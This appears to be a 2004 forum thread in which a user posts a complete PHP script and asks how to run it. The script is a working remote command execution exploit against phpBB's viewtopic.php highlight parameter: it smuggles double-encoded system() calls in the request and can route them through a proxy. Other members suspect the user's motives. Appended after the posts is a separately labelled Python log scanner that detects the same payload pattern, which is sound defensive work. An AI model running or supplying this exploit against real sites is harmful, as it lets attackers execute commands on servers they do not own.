Nov 18, 2004
I have this code, however I have no idea where to put the variables.
Could someone explain to me where to put the variables?
This is the top of the script.


if ($argv[2]){
$url = $argv[1];
$jj = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <jj> [topic id] [man]\n\n";
echo "\tURL\t URL to site (ex: http://127.0.0.1/html)\n";
echo "\tjj\t jj to run\n";
echo "\ttop_id\t top id\n";
echo "\tman\t man\n";
exit;
}
if ($argv[3])
$top = $argv[3];

if ($argv[4])
$man = $argv[4];

---

If you are looking for help scripting a malicious exploit, look elsewhere.

AnandTech Moderator
 
Nov 18, 2004
Here's the whole script:


#!/usr/bin/php -q
<?php


if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}


if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;

if ($argv[4])
$proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&amp;highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>
 

mugs

Lifer
Apr 29, 2003
You're going to have to explain what exactly you mean by this:

Could someone explain to me where to put the variables?

I'd love to help, but your question makes no sense.

If you're asking where $argv[0], etc come from, it's the command line string you use to run the script. So in the case of "script.php http://forums.anandtech.com", $argv[0] would be script.php and $argv[1] would be http://www.anandtech.com.

If that's not what you're asking, ask it better. Ask it in a way that someone who can't read your mind could interpret it. :)
 

UCJefe

Senior member
Jan 27, 2000
If you're asking how to run the script and what arguments to pass in, there is help built right into the script you posted explaining all the arguments. If that's not what you're asking then I have no idea what you are talking about.

I hope you are planning on running this against your own servers to test their vulnerability. Anything else and I smell a ban.
 

skyking

Lifer
Nov 21, 2001
That makes no sense. If you have a vulnerable version, you just patch it. End of story. I would not be asking for help to understand a hack or exploit here.
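For an administrator checking their own forum, the request shape built by the script posted above (a `highlight` parameter on `viewtopic.php` carrying double-URL-encoded quote and dot characters around a PHP call) can be found in web server access logs. The following is an added example, not part of any post in this thread; the log lines, the `/html` path and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

MAX_ROUNDS = 3  # assumption: deep enough to unwrap the double encoding seen in the thread
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CALL_RE = re.compile(r"\b(?:system|exec|passthru|shell_exec|popen|eval|chr)\s*\(", re.I)

# Constructed sample lines (combined log format, documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Nov/2004:10:00:01 +0000] "GET /html/viewtopic.php?t=1&highlight=php+security HTTP/1.1" 200 5120',
    '192.0.2.11 - - [18/Nov/2004:10:00:09 +0000] "GET /html/viewtopic.php?t=1&highlight=don%27t HTTP/1.1" 200 5088',
    '198.51.100.7 - - [18/Nov/2004:10:01:30 +0000] "GET /html/viewtopic.php?t=1&highlight=%2527%252esystem(chr(120))%252e%2527 HTTP/1.0" 200 7341',
]

def fully_decode(value):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def check_line(line):
    """Return a finding dict for a suspicious viewtopic.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("/viewtopic.php"):
        return None
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote(name).lower() != "highlight":
            continue
        decoded, rounds = fully_decode(raw)
        reasons = []
        # A quote that only appears after two or more decode passes was hidden on purpose.
        if rounds >= 2 and ("'" in decoded or '"' in decoded):
            reasons.append("multi-encoded quote")
        if CALL_RE.search(decoded):
            reasons.append("PHP function call")
        if reasons:
            return {"client": line.split()[0], "decoded": decoded,
                    "rounds": rounds, "reasons": reasons}
    return None

def scan(lines):
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A single-encoded apostrophe in an ordinary search term (the second sample line) is deliberately not flagged; only quotes that survive two or more decode passes, or function-call syntax, are reported.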